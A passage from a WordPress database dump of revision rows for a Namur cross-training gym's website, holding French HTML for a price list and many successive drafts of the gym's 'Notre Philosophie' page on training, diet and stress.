santé\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-04 16:29:04', '2013-07-04 16:29:04', '', 11, 'http://www.crosstrainingcenter.be/?p=284', 0, 'revision', '', 0),
(104, 1, '2013-06-16 13:47:09', '2013-06-16 13:47:09', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-96 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-98 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 13:47:09', '2013-06-16 13:47:09', '', 5, 'http://www.crosstrainingcenter.be/?p=104', 0, 'revision', '', 0),
(77, 1, '2013-06-16 10:26:16', '2013-06-16 10:26:16', '<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-52 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x127.png\" width=\"300\" height=\"127\" /></a>\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement.\r\n\r\n&nbsp;\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 10:26:16', '2013-06-16 10:26:16', '', 5, 'http://www.crosstrainingcenter.be/?p=77', 0, 'revision', '', 0),
(79, 1, '2013-06-16 12:22:37', '2013-06-16 12:22:37', '<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-52 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x127.png\" width=\"300\" height=\"127\" /></a>\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement.\r\n\r\n&nbsp;\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n[widgets_on_pages id=\"objectif\"]\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:22:37', '2013-06-16 12:22:37', '', 5, 'http://www.crosstrainingcenter.be/?p=79', 0, 'revision', '', 0),
(80, 1, '2013-06-16 12:48:30', '2013-06-16 12:48:30', '<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement.\r\n\r\n&nbsp;\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n[widgets_on_pages id=\"objectif\"]\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:48:30', '2013-06-16 12:48:30', '', 5, 'http://www.crosstrainingcenter.be/?p=80', 0, 'revision', '', 0),
(81, 1, '2013-06-16 12:49:14', '2013-06-16 12:49:14', '<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n&nbsp;\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:49:14', '2013-06-16 12:49:14', '', 5, 'http://www.crosstrainingcenter.be/?p=81', 0, 'revision', '', 0),
(82, 1, '2013-06-16 12:50:14', '2013-06-16 12:50:14', '<h2>Titre de blabla</h2>\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n&nbsp;\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:50:14', '2013-06-16 12:50:14', '', 5, 'http://www.crosstrainingcenter.be/?p=82', 0, 'revision', '', 0),
(83, 1, '2013-06-16 12:52:57', '2013-06-16 12:52:57', '<h2>Titre de blabla</h2>\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n&nbsp;\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:52:57', '2013-06-16 12:52:57', '', 5, 'http://www.crosstrainingcenter.be/?p=83', 0, 'revision', '', 0),
(84, 1, '2013-06-16 12:56:03', '2013-06-16 12:56:03', '<h2>Assurer un entraînement de qualité :</h2>\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n&nbsp;\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:56:03', '2013-06-16 12:56:03', '', 5, 'http://www.crosstrainingcenter.be/?p=84', 0, 'revision', '', 0),
(85, 1, '2013-06-16 12:57:28', '2013-06-16 12:57:28', '<h2>Assurer un entraînement de qualité :</h2>\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n&nbsp;\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:57:28', '2013-06-16 12:57:28', '', 5, 'http://www.crosstrainingcenter.be/?p=85', 0, 'revision', '', 0),
(86, 1, '2013-06-16 12:57:39', '2013-06-16 12:57:39', '<h2>Assurer un entraînement de qualité :</h2>\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n&nbsp;\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:57:39', '2013-06-16 12:57:39', '', 5, 'http://www.crosstrainingcenter.be/?p=86', 0, 'revision', '', 0),
(88, 1, '2013-06-16 12:58:10', '2013-06-16 12:58:10', '<h2>Assurer un entraînement de qualité :</h2>\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n&nbsp;\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:58:10', '2013-06-16 12:58:10', '', 5, 'http://www.crosstrainingcenter.be/?p=88', 0, 'revision', '', 0),
(87, 1, '2013-06-16 12:57:53', '2013-06-16 12:57:53', '<h2>Assurer un entraînement de qualité :</h2>\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n&nbsp;\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:57:53', '2013-06-16 12:57:53', '', 5, 'http://www.crosstrainingcenter.be/?p=87', 0, 'revision', '', 0),
(89, 1, '2013-06-16 12:58:23', '2013-06-16 12:58:23', '<h2>Assurer un entraînement de qualité :</h2>\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n&nbsp;\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. 